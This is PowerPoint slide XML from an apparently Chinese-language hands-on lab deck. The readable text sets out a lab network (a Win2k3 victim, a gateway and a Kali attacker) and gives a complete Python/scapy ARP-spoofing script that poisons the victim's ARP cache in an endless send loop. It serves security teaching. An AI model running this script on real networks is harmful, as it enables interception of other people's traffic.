              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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00-0c-29-f9-dd-b4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="307340" y="1031240"/>
            <a:ext cx="5344795" cy="2687955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729095" y="918210"/>
            <a:ext cx="4742815" cy="2914015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729095" y="3939540"/>
            <a:ext cx="4349115" cy="1736090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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受害方：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Win2k3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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10.10.10.130</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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10.10.10.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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00-50-56-ef-75-d6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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9"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75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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="275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61"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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067052" y="330463"/>
            <a:ext cx="3100387" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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实战：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"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59" name="椭圆 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513373" y="1411077"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="1634490"/>
            <a:ext cx="8563610" cy="2393950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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&gt;&gt;&gt; getmacbyip("10.10.10.130") #win2K3 ip及MAC地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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'00:0c:29:ec:fb:ec'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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&gt;&gt;&gt; getmacbyip("10.10.10.2") #获得网关mac地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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'00:50:56:ef:75:d6'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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#get_of_hwaddr通过网卡名字获得本机ip地址 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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&gt;&gt;&gt; get_if_hwaddr("eth0") #kali MAC地址 ip为10.10.10.134</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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'00:0c:29:f9:dd:b4'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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97" name="椭圆 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436517" y="1334220"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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9"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75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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="75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9" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="97"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725805" y="258445"/>
            <a:ext cx="10805795" cy="6012180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#coding: utf-8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from scapy.all import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tip = "10.10.10.130"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lip = "10.10.10.134"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gip = "10.10.10.2"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interFACE = "eth0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmac = getmacbyip(tip)  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Win2k3 mac</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lmac = get_if_hwaddr(interFACE) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali mac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gmac = getmacbyip(gip) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获得网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#构造arp欺骗包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pack = Ether(dst=tmac,src=lmac )/ARP(op=1,hwsrc=lmac,psrc=gip,hwdst=tmac,pdst=tip)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while True: #一直发送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	sendp(pack, inter=2, iface=interFACE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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p14:dur="9"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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067052" y="330463"/>
            <a:ext cx="3100387" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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实战：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"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61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772920" y="1275715"/>
            <a:ext cx="8646795" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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查看构造包所需参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155700" y="2144395"/>
            <a:ext cx="9690735" cy="398526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75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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="75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6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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067052" y="330463"/>
            <a:ext cx="3100387" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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实战：</a:t>
